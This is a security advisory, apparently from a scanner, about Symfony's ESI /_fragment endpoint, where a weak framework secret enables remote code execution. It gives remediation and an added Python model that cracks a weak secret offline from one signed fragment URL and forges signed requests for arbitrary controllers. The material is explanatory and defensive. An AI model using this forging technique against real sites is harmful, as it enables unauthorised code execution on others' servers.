Description

Edge Side Includes (ESI) is a small markup language for edge-level dynamic web content assembly. The ESI specification describes tags you can embed in your pages to tell the gateway cache which fragments of the page to fetch separately and assemble before the response is returned to the client.

Your Symfony web application is configured with ESI (Edge-Side Includes) enabled. With ESI enabled, Symfony exposes the /_fragment endpoint, which renders controllers on behalf of the cache. A request to /_fragment is honoured only if it carries a valid _hash parameter, an HMAC over the URL computed from the framework configuration value secret; that signature is the endpoint's only access control. Anyone who knows or can guess the secret can therefore sign requests for controllers of their choosing, and /_fragment can be used to run arbitrary PHP code. A weak, default or predictable secret (for example the placeholder value from an old project skeleton, or a value committed to a public repository) turns the endpoint into a remote code execution vector.

Remediation

Make sure your Symfony web application uses a strong value for Symfony's configuration value secret: a random string of at least 32 characters generated from a cryptographically secure source, never the default or an example value, and rotated if it may have been exposed (in a repository, a backup or an error page). Note that the same secret also protects CSRF tokens and remember-me cookies, so disabling ESI alone does not remove the risk of a weak secret. Consider disabling ESI (if not required) via

# config/packages/framework.yaml
framework:
    # ...
    esi: false
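The signature check that the secret protects, as an added example that is not part of this page or of Symfony's own code: a stand-alone Python model of the _hash scheme Symfony's UriSigner uses (HMAC-SHA256 over the URL with _hash removed and query parameters sorted, base64-encoded, appended as _hash). The canonicalisation, the host name app.example, the controller names and the wordlist are constructed for the illustration and are assumptions, so the exact hash bytes may differ from a real installation. The point it demonstrates does not depend on them: one signed fragment URL (as emitted in ESI markup or found in logs) lets an attacker test secret guesses offline, a weak secret is recovered in milliseconds, and with it they can sign a /_fragment request for any controller; a secret from a CSPRNG is not recoverable this way.

```python
"""Model of Symfony's /_fragment URL signing (added example, not Symfony code).

Assumption: Symfony's UriSigner computes base64(HMAC-SHA256(secret, canonical URL)),
where the canonical URL has the _hash parameter removed and the query sorted.
The helpers below approximate that; they are not byte-compatible with a real install.
"""
import base64
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

HASH_PARAM = "_hash"

# Constructed inputs for the demonstration (assumptions, not data from the page).
WEAK_SECRET = "ThisTokenIsNotSoSecretChangeIt"   # placeholder shipped in old Symfony skeletons
WORDLIST = ["secret", "changeme", "ThisTokenIsNotSoSecretChangeIt", "password123"]
BASE_URL = "https://app.example"


def _query_pairs(url: str):
    """Decoded (key, value) pairs of the URL's query string, _hash excluded."""
    return [(k, v) for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if k != HASH_PARAM]


def canonical_url(url: str) -> str:
    """Drop _hash and sort the query, the way the signer normalises a URL before hashing."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path,
                       urlencode(sorted(_query_pairs(url))), parts.fragment))


def compute_hash(url: str, secret: str) -> str:
    digest = hmac.new(secret.encode(), canonical_url(url).encode(), hashlib.sha256).digest()
    return base64.b64encode(digest).decode()


def sign(url: str, secret: str) -> str:
    """What the application does when it emits a fragment URL: append _hash."""
    parts = urlsplit(url)
    pairs = _query_pairs(url) + [(HASH_PARAM, compute_hash(url, secret))]
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(pairs), parts.fragment))


def verify(url: str, secret: str) -> bool:
    """What the fragment listener does before honouring a /_fragment request."""
    presented = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True)).get(HASH_PARAM)
    if presented is None:
        return False
    return hmac.compare_digest(presented, compute_hash(url, secret))


def forge_fragment_url(secret: str, controller: str, **args) -> str:
    """Sign a /_fragment request for an arbitrary controller; _path carries the inner
    request parameters as a nested query string (modelled format, see module docstring)."""
    inner = urlencode({"_controller": controller, **args})
    return sign(f"{BASE_URL}/_fragment?{urlencode({'_path': inner})}", secret)


def recover_secret(signed_url: str, candidates):
    """Offline attack: one signed URL is enough to test guesses at HMAC speed,
    with no requests to the target. Returns the matching secret, or None."""
    for guess in candidates:
        if verify(signed_url, guess):
            return guess
    return None


def generate_secret(nbytes: int = 32) -> str:
    """Remediation: 64 hex characters from a CSPRNG; nothing a wordlist will contain."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    # A legitimate fragment URL the application exposed to the cache, signed with the weak secret.
    leaked = forge_fragment_url(WEAK_SECRET, r"App\Controller\NewsController::list")
    found = recover_secret(leaked, WORDLIST)
    print("recovered secret:", found)
    if found:
        print("forged request:", forge_fragment_url(found, r"App\Controller\AdminController::reset"))
    strong = generate_secret()
    print("strong secret recovered:",
          recover_secret(forge_fragment_url(strong, r"App\Controller\NewsController::list"), WORDLIST))
```

Run it as a script to see the weak secret come back from the wordlist and a forged admin fragment URL that verify() would accept, while the URL signed with generate_secret() yields None. The same loop over a real secret wordlist is what an attacker runs against a captured fragment URL, which is why the remediation insists on a random secret rather than a merely "changed" one.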
